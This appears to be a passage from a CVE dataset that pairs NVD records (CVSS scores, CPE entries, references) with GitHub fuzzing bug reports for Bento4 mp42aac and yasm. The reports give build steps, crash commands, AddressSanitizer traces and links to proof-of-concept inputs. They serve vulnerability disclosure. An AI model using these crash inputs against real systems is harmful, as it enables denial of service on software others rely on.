"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/842 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory",
"Vendor Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] |
# Summary
Hello, I found out-of-memory bug in mp42aac
# BUG
out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42aac+0x4c44dd) in operator new(unsigned long)
# Build
ubuntu 20.04
```
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -g"
export CXXFLAGS="-fsanitize=address -g"
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
```
```
./mp42aac poc4.mp4 /dev/null
=================================================================
==1258592==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x800000010 bytes
#0 0x4c44dd in operator new(unsigned long) (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42aac+0x4c44dd)
#1 0x6054ee in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:172:25
#2 0x6054ee in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4Array.h:210:25
#3 0x6054ee in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:150:9
#4 0x604de2 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16
#5 0x53a0dd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20
#6 0x5390e1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#7 0x57718b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#8 0x5763de in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#9 0x5763de in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#10 0x53a8dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#11 0x5390e1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#12 0x57718b in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#13 0x5763de in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5
#14 0x5763de in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20
#15 0x53a8dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20
#16 0x5390e1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
#17 0x53890b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
#18 0x4ceffe in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:104:12
#19 0x4cf50a in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4File.cpp:78:5
#20 0x4c7232 in main /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22
#21 0x7fb9e650c082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
==1258592==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42aac+0x4c44dd) in operator new(unsigned long)
==1258592==ABORTING
```
# poc
https://github.com/z1r00/fuzz_vuln/blob/main/Bento4/mp42aac/poc4.zip
| out-of-memory in mp42aac | https://api.github.com/repos/axiomatic-systems/Bento4/issues/842/comments | 1 | 2023-03-14T02:50:05Z | 2024-02-17T17:52:59Z | https://github.com/axiomatic-systems/Bento4/issues/842 | 1,622,631,441 | 842 |
CVE-2023-29579 | 2023-04-24T13:15:07.440 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the component yasm/yasm+0x43b466 in vsprintf. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/214"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-buffer-overflow/yasm/readmd.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/214 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-buffer-overflow yasm/yasm+0x43b466 in vsprintf
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-buffer-overflow/yasm/id:000055%2Csig:06%2Csrc:008089%2B007532%2Cop:splice%2Crep:128
## ASAN Info
```c
./yasm id:000055,sig:06,src:008089+007532,op:splice,rep:128
yasm: file name already has no extension: output will be in `yasm.out'
=================================================================
==1107138==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffb43ff890 at pc 0x00000043b467 bp 0x7fffb43ff760 sp 0x7fffb43feef8
WRITE of size 21 at 0x7fffb43ff890 thread T0
#0 0x43b466 in vsprintf (/home/z1r0/fuzzing/yasm/yasm/yasm+0x43b466)
#1 0x43c3f3 in sprintf (/home/z1r0/fuzzing/yasm/yasm/yasm+0x43c3f3)
#2 0x54e503 in x86_dir_cpu /home/z1r0/fuzzing/yasm/yasm/modules/arch/x86/x86arch.c:169:17
#3 0x539e14 in yasm_object_directive /home/z1r0/fuzzing/yasm/yasm/libyasm/section.c:377:5
#4 0x57bfe2 in nasm_parser_directive /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1569:10
#5 0x579361 in parse_line /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:377:17
#6 0x579361 in nasm_parser_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:231:18
#7 0x577618 in nasm_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:66:5
#8 0x577618 in nasm_parser_do_parse /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parser.c:83:5
#9 0x4c6eae in do_assemble /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:521:5
#10 0x4c6eae in main /home/z1r0/fuzzing/yasm/yasm/frontends/yasm/yasm.c:753:12
#11 0x7f833dc86082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x41c47d in _start (/home/z1r0/fuzzing/yasm/yasm/yasm+0x41c47d)
Address 0x7fffb43ff890 is located in stack of thread T0 at offset 48 in frame
#0 0x54e38f in x86_dir_cpu /home/z1r0/fuzzing/yasm/yasm/modules/arch/x86/x86arch.c:153
This frame has 1 object(s):
[32, 48) 'strcpu' (line 168) <== Memory access at offset 48 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/z1r0/fuzzing/yasm/yasm/yasm+0x43b466) in vsprintf
Shadow bytes around the buggy address:
0x100076877ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877f00: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100076877f10: 00 00[f3]f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877f30: f1 f1 f1 f1 f8 f3 f3 f3 00 00 00 00 00 00 00 00
0x100076877f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100076877f50: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 f8 f8 f2 f2
0x100076877f60: f8 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1107138==ABORTING
```
# Reference
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-buffer-overflow/yasm/readmd.md | stack-buffer-overflow yasm/yasm+0x43b466 in vsprintf | https://api.github.com/repos/yasm/yasm/issues/214/comments | 1 | 2023-03-30T13:06:13Z | 2024-03-21T12:42:39Z | https://github.com/yasm/yasm/issues/214 | 1,647,586,741 | 214 |
CVE-2023-29582 | 2023-04-24T13:15:07.483 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr1 at /nasm/nasm-parse.c. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": null,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2189601#c3"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/217"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr1/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/217 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1235 in parse_expr1
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr1/id:000206%2Csig:06%2Csrc:007018%2B003531%2Cop:splice%2Crep:32
## ASAN Info
```c
./yasm id:000206,sig:06,src:007018+003531,op:splice,rep:32
yasm: file name already has no extension: output will be in `yasm.out'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2596551==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe5cfb8fe8 (pc 0x00000057e8cb bp 0x7ffe5cfb9040 sp 0x7ffe5cfb8ff0 T0)
#0 0x57e8cb in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1235
#1 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#2 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#3 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#4 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#5 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#6 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#7 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#8 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#9 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#10 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#11 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#12 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#13 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#14 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#15 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#16 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#17 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#18 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#19 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#20 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#21 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#22 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#23 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#24 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#25 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#26 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#27 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#28 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#29 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#30 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#31 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#32 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#33 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#34 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#35 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#36 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#37 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#38 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#39 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#40 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#41 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#42 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#43 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#44 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#45 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#46 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#47 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#48 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#49 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#50 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#51 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#52 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#53 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#54 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#55 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#56 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#57 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#58 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#59 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#60 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#61 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#62 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#63 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#64 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#65 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#66 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#67 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#68 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#69 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#70 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#71 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#72 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#73 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#74 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#75 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#76 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#77 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#78 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#79 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#80 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#81 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#82 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#83 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#84 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#85 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#86 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#87 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#88 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#89 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#90 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#91 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#92 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#93 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#94 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#95 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#96 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#97 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#98 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#99 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#100 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#101 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#102 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#103 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#104 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#105 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#106 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#107 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#108 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#109 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
